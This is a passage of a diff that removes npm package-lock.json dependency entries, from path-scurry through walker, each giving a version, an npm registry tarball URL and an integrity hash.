"sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "path-scurry": { - "version": "1.11.1", - "resolved": "https://registry.npmjs.org/path-scurry/-/path-scurry-1.11.1.tgz", - "integrity": "sha512-Xa4Nw17FS9ApQFJ9umLiJS4orGjm7ZzwUrwamcGQuHSzDyth9boKDaycYdDcZDuqYATXw4HFXgaqWTctW/v1HA==", - "requires": { - "lru-cache": "^10.2.0", - "minipass": "^5.0.0 || ^6.0.2 || ^7.0.0" - }, - "dependencies": { - "lru-cache": { - "version": "10.4.3", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz", - "integrity": "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==" - } - } - }, - "path-type": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-type/-/path-type-4.0.0.tgz", - "integrity": "sha512-gDKb8aZMDeD/tZWs9P6+q0J9Mwkdl6xMV8TjnGP3qJVJ06bdMgkbBlLU8IdfOsIsFz2BW1rNVT3XuNEl8zPAvw==", - "dev": true - }, - "performance-now": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/performance-now/-/performance-now-2.1.0.tgz", - "integrity": "sha512-7EAHlyLHI56VEIdK57uwHdHKIaAGbnXPiw0yWbarQZOKaKpvUIgW0jWRVLiatnM+XXlSwsanIBH/hzGMJulMow==" - }, - "picocolors": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", - "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.6", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.6.tgz", - "integrity": "sha512-saLsH7WeYYPiD25LDuLRRY/i+6HaPYr6G1OUlN39otzkSTxKnubR9RTxS3/Kk50s1g2JTgFwWQDQyplC5/SHZg==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - }, - "dependencies": { - "find-up": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/find-up/-/find-up-4.1.0.tgz", - "integrity": "sha512-PpOwAdQ/YlXQ2vj8a3h8IipDuYRi3wceVQQGYWxNINccq40Anw7BlsEXCMbt1Zt+OLA6Fq9suIpIWD0OsnISlw==", - "dev": true, - "requires": { - "locate-path": "^5.0.0", - "path-exists": "^4.0.0" - } - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - } - } - } - }, - "prelude-ls": { - "version": "1.2.1", - "resolved": "https://registry.npmjs.org/prelude-ls/-/prelude-ls-1.2.1.tgz", - "integrity": "sha512-vkcDPrRZo1QZLbn5RLGPpg/WmIQ65qoWWhcGKf/b5eplkkarX0m9z8ppCat4mlOqUsWpyNuYgO3VRyrYHSzX5g==", - "dev": true, - "peer": true - }, - "pretty-format": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", - "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", - "dev": true, - "requires": { - "@jest/schemas": "^29.6.3", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "psl": { - "version": "1.9.0", - "resolved": "https://registry.npmjs.org/psl/-/psl-1.9.0.tgz", - "integrity": "sha512-E/ZsdU4HLs/68gYzgGTkMicWTLPdAftJLfJFlLUAAKZGkStNU72sZjT66SnMDVOfOWY/YAoiD7Jxa9iHvngcag==" - }, - "punycode": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/punycode/-/punycode-2.3.0.tgz", - "integrity": "sha512-rRV+zQD8tVFys26lAGR9WUuS4iUAngJScM+ZRSKtvl5tKeZ2t5bvdNFdNHBW9FWR4guGHlgmsZ1G7BSm2wTbuA==" - }, - "pure-rand": { - "version": "6.1.0", - "resolved": "https://registry.npmjs.org/pure-rand/-/pure-rand-6.1.0.tgz", - "integrity": "sha512-bVWawvoZoBYpp6yIoQtQXHZjmz35RSVHnUOTefl8Vcjr8snTPY1wnpSPMWekcFwbxI6gtmT7rSYPFvz71ldiOA==", - "dev": true - }, - "qs": { - "version": "6.5.3", - "resolved": "https://registry.npmjs.org/qs/-/qs-6.5.3.tgz", - "integrity": "sha512-qxXIEh4pCGfHICj1mAJQ2/2XVZkjCDTcEgfoSQxc/fYivUZxTkk7L3bDBJSoNrEzXI17oUO5Dp07ktqE5KzczA==" - }, - "queue-microtask": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/queue-microtask/-/queue-microtask-1.2.3.tgz", - "integrity": "sha512-NuaNSa6flKT5JaSYQzJok04JzTL1CA6aGhv5rfLW3PgqA+M2ChpZQnAC8h8i4ZFkBS8X5RqkDBHA7r4hej3K9A==", - "dev": true, - "peer": true - }, - "react-is": { - "version": "18.3.1", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", - "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", - "dev": true - }, - "request": { - "version": "2.88.2", - "resolved": "https://registry.npmjs.org/request/-/request-2.88.2.tgz", - "integrity": "sha512-MsvtOrfG9ZcrOwAW+Qi+F6HbD0CWXEh9ou77uOb7FM2WPhwT7smM833PzanhJLsgXjN89Ir6V2PczXNnMpwKhw==", - "requires": { - "aws-sign2": "~0.7.0", - "aws4": "^1.8.0", - "caseless": "~0.12.0", - "combined-stream": "~1.0.6", - "extend": "~3.0.2", - "forever-agent": "~0.6.1", - "form-data": "~2.3.2", - "har-validator": "~5.1.3", - "http-signature": "~1.2.0", - "is-typedarray": "~1.0.0", - "isstream": "~0.1.2", - "json-stringify-safe": "~5.0.1", - "mime-types": "~2.1.19", - "oauth-sign": "~0.9.0", - "performance-now": "^2.1.0", - "qs": "~6.5.2", - "safe-buffer": "^5.1.2", - "tough-cookie": "~2.5.0", - "tunnel-agent": "^0.6.0", - "uuid": "^3.3.2" - }, - "dependencies": { - "form-data": { - "version": "2.3.3", - "resolved": "https://registry.npmjs.org/form-data/-/form-data-2.3.3.tgz", - "integrity": "sha512-1lLKB2Mu3aGP1Q/2eCOx0fNbRMe7XdwktwOruhfqqd0rIJWwN4Dh+E3hrPSlDCXnSR7UtZ1N38rVXm+6+MEhJQ==", - "requires": { - "asynckit": "^0.4.0", - "combined-stream": "^1.0.6", - "mime-types": "^2.1.12" - } - } - } - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, - "requires": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - }, - "dependencies": { - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - } - } - }, - "resolve-from": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-4.0.0.tgz", - "integrity": "sha512-pb/MYmXstAkysRFx8piNI1tGFNQIFA3vkE3Gq4EuA1dF6gHp/+vgZqsCGJapvy8N3Q+4o7FwvquPJcnZ7RYy4g==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.2.tgz", - "integrity": "sha512-X2UW6Nw3n/aMgDVy+0rSqgHlv39WZAlZrXCdnbyEiKm17DSqHX4MmQMaST3FbeWR5FTuRcUwYAziZajji0Y7mg==", - "dev": true - }, - "reusify": { - "version": "1.0.4", - "resolved": "https://registry.npmjs.org/reusify/-/reusify-1.0.4.tgz", - "integrity": "sha512-U9nH88a3fc/ekCF1l0/UP1IosiuIjyTh7hBvXVMHYgVcfGvt897Xguj2UOLDeI5BG2m7/uwyaLVT6fbtCwTyzw==", - "dev": true, - "peer": true - }, - "rfc4648": { - "version": "1.5.2", - "resolved": "https://registry.npmjs.org/rfc4648/-/rfc4648-1.5.2.tgz", - "integrity": "sha512-tLOizhR6YGovrEBLatX1sdcuhoSCXddw3mqNVAcKxGJ+J0hFeJ+SjeWCv5UPA/WU3YzWPPuCVYgXBKZUPGpKtg==" - }, - "rimraf": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/rimraf/-/rimraf-3.0.2.tgz", - "integrity": "sha512-JZkJMZkAGFFPP2YqXZXPbMlMBgsxzE8ILs4lMIX/2o0L9UBw9O/Y3o6wFw/i9YLapcUJWwqbi3kdxIPdC62TIA==", - "dev": true, - "peer": true, - "requires": { - "glob": "^7.1.3" - } - }, - "run-parallel": { - "version": "1.2.0", - "resolved": "https://registry.npmjs.org/run-parallel/-/run-parallel-1.2.0.tgz", - "integrity": "sha512-5l4VyZR86LZ/lDxZTR6jqL8AFE2S0IFLMP26AbjsLVADxHdhB/c0GUsH+y39UfCi3dzz8OlQuPmnaJOMoDHQBA==", - "dev": true, - "peer": true, - "requires": { - "queue-microtask": "^1.2.2" - } - }, - "safe-buffer": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", - "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==" - }, - "safer-buffer": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/safer-buffer/-/safer-buffer-2.1.2.tgz", - "integrity": "sha512-YZo3K82SD7Riyi0E1EQPojLz7kpepnSQI9IyPbHHg1XXXevb5dJI7tpyN2ADxGcQbHG7vcyRHk0cbwqcQriUtg==" - }, - "semver": { - "version": "6.3.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-6.3.1.tgz", - "integrity": "sha512-BR7VvDCVHO+q2xBEWskxS6DJE1qRnb7DxzUrogb71CWoSficBxYsiAGd+Kl0mmq/MprG9yArRkyrQxTO6XjMzA==", - "dev": true - }, - "shebang-command": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/shebang-command/-/shebang-command-2.0.0.tgz", - "integrity": "sha512-kHxr2zZpYtdmrN1qDjrrX/Z1rR1kG8Dx+gkpK1G4eXmvXswmcE1hTWBWYUzlraYw1/yZp6YuDY77YtvbN0dmDA==", - "requires": { - "shebang-regex": "^3.0.0" - } - }, - "shebang-regex": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/shebang-regex/-/shebang-regex-3.0.0.tgz", - "integrity": "sha512-7++dFhtcx3353uBaq8DDR4NuxBetBzC7ZQOhmTQInHEd6bSrXdiEyzCvG07Z44UYdLShWUyXt5M/yhz8ekcb1A==" - }, - "signal-exit": { - "version": "3.0.7", - "resolved": "https://registry.npmjs.org/signal-exit/-/signal-exit-3.0.7.tgz", - "integrity": "sha512-wnD2ZE+l+SPC/uoS0vXeE9L1+0wuaMqKlfz9AMUo38JsyLSBWSFcHR1Rri62LZc12vLr1gb3jl7iwQhgwpAbGQ==", - "dev": true - }, - "sisteransi": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/sisteransi/-/sisteransi-1.0.5.tgz", - "integrity": "sha512-bLGGlR1QxBcynn2d5YmDX4MGjlZvy2MRBDRNHLJ8VI6l6+9FUiyTFNJ0IveOSP0bcXgVDPRcfGqA0pjaqUpfVg==", - "dev": true - }, - "slash": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/slash/-/slash-3.0.0.tgz", - "integrity": "sha512-g9Q1haeby36OSStwb4ntCGGGaKsaVSjQ68fBxoQcutl5fS1vuY18H3wSt3jFyFtrkx+Kz0V1G85A4MyAdDMi2Q==", - "dev": true - }, - "source-map": { - "version": "0.6.1", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.6.1.tgz", - "integrity": "sha512-UjgapumWlbMhkBgzT7Ykc5YXUT46F0iKu8SGXq0bcwP5dz/h0Plj6enJqjz1Zbq2l5WaqYnrVbwWOWMyF3F47g==", - "dev": true - }, - "source-map-support": { - "version": "0.5.13", - "resolved": "https://registry.npmjs.org/source-map-support/-/source-map-support-0.5.13.tgz", - "integrity": "sha512-SHSKFHadjVA5oR4PPqhtAVdcBWwRYVd6g6cAXnIbRiIwc2EhPrTuKUBdSLvlEKyIP3GCf89fltvcZiP9MMFA1w==", - "dev": true, - "requires": { - "buffer-from": "^1.0.0", - "source-map": "^0.6.0" - } - }, - "sprintf-js": { - "version": "1.0.3", - "resolved": "https://registry.npmjs.org/sprintf-js/-/sprintf-js-1.0.3.tgz", - "integrity": "sha512-D9cPgkvLlV3t3IzL0D0YLvGA9Ahk4PcvVwUbN0dSGr1aP0Nrt4AEnTUbuGvquEC0mA64Gqt1fzirlRs5ibXx8g==", - "dev": true - }, - "sshpk": { - "version": "1.17.0", - "resolved": "https://registry.npmjs.org/sshpk/-/sshpk-1.17.0.tgz", - "integrity": "sha512-/9HIEs1ZXGhSPE8X6Ccm7Nam1z8KcoCqPdI7ecm1N33EzAetWahvQWVqLZtaZQ+IDKX4IyA2o0gBzqIMkAagHQ==", - "requires": { - "asn1": "~0.2.3", - "assert-plus": "^1.0.0", - "bcrypt-pbkdf": "^1.0.0", - "dashdash": "^1.12.0", - "ecc-jsbn": "~0.1.1", - "getpass": "^0.1.1", - "jsbn": "~0.1.0", - "safer-buffer": "^2.0.2", - "tweetnacl": "~0.14.0" - } - }, - "stack-utils": { - "version": "2.0.6", - "resolved": "https://registry.npmjs.org/stack-utils/-/stack-utils-2.0.6.tgz", - "integrity": "sha512-XlkWvfIm6RmsWtNJx+uqtKLS8eqFbxUg0ZzLXqY0caEy9l7hruX8IpiDnjsLavoBgqCCR71TqWO8MaXYheJ3RQ==", - "dev": true, - "requires": { - "escape-string-regexp": "^2.0.0" - }, - "dependencies": { - "escape-string-regexp": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-2.0.0.tgz", - "integrity": "sha512-UpzcLCXolUWcNu5HtVMHYdXJjArjsF9C0aNnquZYY4uW/Vu0miy5YoWvbV345HauVvcAUnpRuhMMcqTcGOY2+w==", - "dev": true - } - } - }, - "stream-buffers": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/stream-buffers/-/stream-buffers-3.0.2.tgz", - "integrity": "sha512-DQi1h8VEBA/lURbSwFtEHnSTb9s2/pwLEaFuNhXwy1Dx3Sa0lOuYT2yNUr4/j2fs8oCAMANtrZ5OrPZtyVs3MQ==" - }, - "string-length": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/string-length/-/string-length-4.0.2.tgz", - "integrity": "sha512-+l6rNN5fYHNhZZy41RXsYptCjA2Igmq4EG7kZAYFQI1E1VTXarr6ZPXBg6eq7Y6eK4FEhY6AJlyuFIb/v/S0VQ==", - "dev": true, - "requires": { - "char-regex": "^1.0.2", - "strip-ansi": "^6.0.0" - } - }, - "string-width": { - "version": "4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "string-width-cjs": { - "version": "npm:string-width@4.2.3", - "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", - "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", - "requires": { - "emoji-regex": "^8.0.0", - "is-fullwidth-code-point": "^3.0.0", - "strip-ansi": "^6.0.1" - } - }, - "strip-ansi": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-ansi-cjs": { - "version": "npm:strip-ansi@6.0.1", - "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", - "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", - "requires": { - "ansi-regex": "^5.0.1" - } - }, - "strip-bom": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/strip-bom/-/strip-bom-4.0.0.tgz", - "integrity": "sha512-3xurFv5tEgii33Zi8Jtp55wEIILR9eh34FAW00PZf+JnSsTmV/ioewSgQl97JHvgjoRGwPShsWm+IdrxB35d0w==", - "dev": true - }, - "strip-final-newline": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", - "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", - "dev": true - }, - "strip-json-comments": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/strip-json-comments/-/strip-json-comments-3.1.1.tgz", - "integrity": "sha512-6fPc+R4ihwqP6N/aIv2f1gMH8lOVtWQHoqC4yK6oSDVVocumAsfCqjkXnqiYMhmMwS/mEHLp7Vehlt3ql6lEig==", - "dev": true - }, - "supports-color": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", - "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - }, - "supports-preserve-symlinks-flag": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/supports-preserve-symlinks-flag/-/supports-preserve-symlinks-flag-1.0.0.tgz", - "integrity": "sha512-ot0WnXS9fgdkgIcePe6RHNk1WA8+muPa6cSjeR3V8K27q9BB1rTE3R1p7Hv0z1ZyAc8s6Vvv8DIyWf681MAt0w==", - "dev": true - }, - "tar": { - "version": "7.4.3", - "resolved": "https://registry.npmjs.org/tar/-/tar-7.4.3.tgz", - "integrity": "sha512-5S7Va8hKfV7W5U6g3aYxXmlPoZVAwUMy9AOKyF2fVuZa2UD3qZjg578OrLRt8PcNN1PleVaL/5/yYATNL0ICUw==", - "requires": { - "@isaacs/fs-minipass": "^4.0.0", - "chownr": "^3.0.0", - "minipass": "^7.1.2", - "minizlib": "^3.0.1", - "mkdirp": "^3.0.1", - "yallist": "^5.0.0" - }, - "dependencies": { - "yallist": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-5.0.0.tgz", - "integrity": "sha512-YgvUTfwqyc7UXVMrB+SImsVYSmTS8X/tSrtdNZMImM+n7+QTriRXyXim0mBrTXNeqzVF0KWGgHPeiyViFFrNDw==" - } - } - }, - "test-exclude": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/test-exclude/-/test-exclude-6.0.0.tgz", - "integrity": "sha512-cAGWPIyOHU6zlmg88jwm7VRyXnMN7iV68OGAbYDk/Mh/xC/pzVPlQtY6ngoIH/5/tciuhGfvESU8GrHrcxD56w==", - "dev": true, - "requires": { - "@istanbuljs/schema": "^0.1.2", - "glob": "^7.1.4", - "minimatch": "^3.0.4" - } - }, - "text-table": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/text-table/-/text-table-0.2.0.tgz", - "integrity": "sha512-N+8UisAXDGk8PFXP4HAzVR9nbfmVJ3zYLAWiTIoqC5v5isinhr+r5uaO8+7r3BMfuNIufIsA7RdpVgacC2cSpw==", - "dev": true, - "peer": true - }, - "throat": { - "version": "6.0.2", - "resolved": "https://registry.npmjs.org/throat/-/throat-6.0.2.tgz", - "integrity": "sha512-WKexMoJj3vEuK0yFEapj8y64V0A6xcuPuK9Gt1d0R+dzCSJc0lHqQytAbSB4cDAK0dWh4T0E2ETkoLE2WZ41OQ==", - "dev": true - }, - "tmpl": { - "version": "1.0.5", - "resolved": "https://registry.npmjs.org/tmpl/-/tmpl-1.0.5.tgz", - "integrity": "sha512-3f0uOEAQwIqGuWW2MVzYg8fV/QNnc/IpuJNG837rLuczAaLVHslWHZQj4IGiEl5Hs3kkbhwL9Ab7Hrsmuj+Smw==", - "dev": true - }, - "to-regex-range": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/to-regex-range/-/to-regex-range-5.0.1.tgz", - "integrity": "sha512-65P7iz6X5yEr1cwcgvQxbbIw7Uk3gOy5dIdtZ4rDveLqhrdJP+Li/Hx6tyK0NEb+2GCyneCMJiGqrADCSNk8sQ==", - "dev": true, - "requires": { - "is-number": "^7.0.0" - } - }, - "tough-cookie": { - "version": "2.5.0", - "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-2.5.0.tgz", - "integrity": "sha512-nlLsUzgm1kfLXSXfRZMc1KLAugd4hqJHDTvc2hDIwS3mZAfMEuMbc03SujMF+GEcpaX/qboeycw6iO8JwVv2+g==", - "requires": { - "psl": "^1.1.28", - "punycode": "^2.1.1" - } - }, - "tslib": { - "version": "2.4.1", - "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.4.1.tgz", - "integrity": "sha512-tGyy4dAjRIEwI7BzsB0lynWgOpfqjUdq91XXAlIWD2OwKBH7oCl/GZG/HT4BOHrTlPMOASlMQ7veyTqpmRcrNA==" - }, - "tunnel-agent": { - "version": "0.6.0", - "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", - "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", - "requires": { - "safe-buffer": "^5.0.1" - } - }, - "tweetnacl": { - "version": "0.14.5", - "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", - "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" - }, - "type-check": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/type-check/-/type-check-0.4.0.tgz", - "integrity": "sha512-XleUoc9uwGXqjWwXaUTZAmzMcFZ5858QA2vvx1Ur5xIcixXIP+8LnFDgRplU30us6teqdlskFfu+ae4K79Ooew==", - "dev": true, - "peer": true, - "requires": { - "prelude-ls": "^1.2.1" - } - }, - "type-detect": { - "version": "4.0.8", - "resolved": "https://registry.npmjs.org/type-detect/-/type-detect-4.0.8.tgz", - "integrity": "sha512-0fr/mIH1dlO+x7TlcMy+bIDqKPsw/70tVyeHW787goQjhmqaZe10uwLujubK9q9Lg6Fiho1KUKDYz0Z7k7g5/g==", - "dev": true - }, - "type-fest": { - "version": "0.20.2", - "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.20.2.tgz", - "integrity": "sha512-Ne+eE4r0/iWnpAxD852z3A+N0Bt5RN//NjJwRd2VFHEmrywxf5vsZlh4R6lixl6B+wz/8d+maTSAkN1FIkI3LQ==", - "dev": true, - "peer": true - }, - "undici-types": { - "version": "6.20.0", - "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-6.20.0.tgz", - "integrity": "sha512-Ny6QZ2Nju20vw1SRHe3d9jVu6gJ+4e3+MMpqu7pqE5HT6WsTSlce++GQmK5UXS8mzV8DSYHrQH+Xrf2jVcuKNg==", - "dev": true - }, - "update-browserslist-db": { - "version": "1.1.1", - "resolved": "https://registry.npmjs.org/update-browserslist-db/-/update-browserslist-db-1.1.1.tgz", - "integrity": "sha512-R8UzCaa9Az+38REPiJ1tXlImTJXlVfgHZsglwBD/k6nj76ctsH1E3q4doGrukiLQd3sGQYu56r5+lo5r94l29A==", - "dev": true, - "requires": { - "escalade": "^3.2.0", - "picocolors": "^1.1.0" - } - }, - "uri-js": { - "version": "4.4.1", - "resolved": "https://registry.npmjs.org/uri-js/-/uri-js-4.4.1.tgz", - "integrity": "sha512-7rKUyy33Q1yc98pQ1DAmLtwX109F7TIfWlW1Ydo8Wl1ii1SeHieeh0HHfPeL2fMXK6z0s8ecKs9frCuLJvndBg==", - "requires": { - "punycode": "^2.1.0" - } - }, - "uuid": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/uuid/-/uuid-3.4.0.tgz", - "integrity": "sha512-HjSDRw6gZE5JMggctHBcjVak08+KEVhSIiDzFnT9S9aegmp85S/bReBVTb4QTFaRNptJ9kuYaNhnbNEOkbKb/A==" - }, - "v8-to-istanbul": { - "version": "9.3.0", - "resolved": "https://registry.npmjs.org/v8-to-istanbul/-/v8-to-istanbul-9.3.0.tgz", - "integrity": "sha512-kiGUalWN+rgBJ/1OHZsBtU4rXZOfj/7rKQxULKlIzwzQSvMJUUNgPwJEEh7gU6xEVxC0ahoOBvN2YI8GH6FNgA==", - "dev": true, - "requires": { - "@jridgewell/trace-mapping": "^0.3.12", - "@types/istanbul-lib-coverage": "^2.0.1", - "convert-source-map": "^2.0.0" - } - }, - "verror": { - "version": "1.10.0", - "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", - "integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", - "requires": { - "assert-plus": "^1.0.0", - "core-util-is": "1.0.2", - "extsprintf": "^1.2.0" - } - }, - "walker": { - "version": 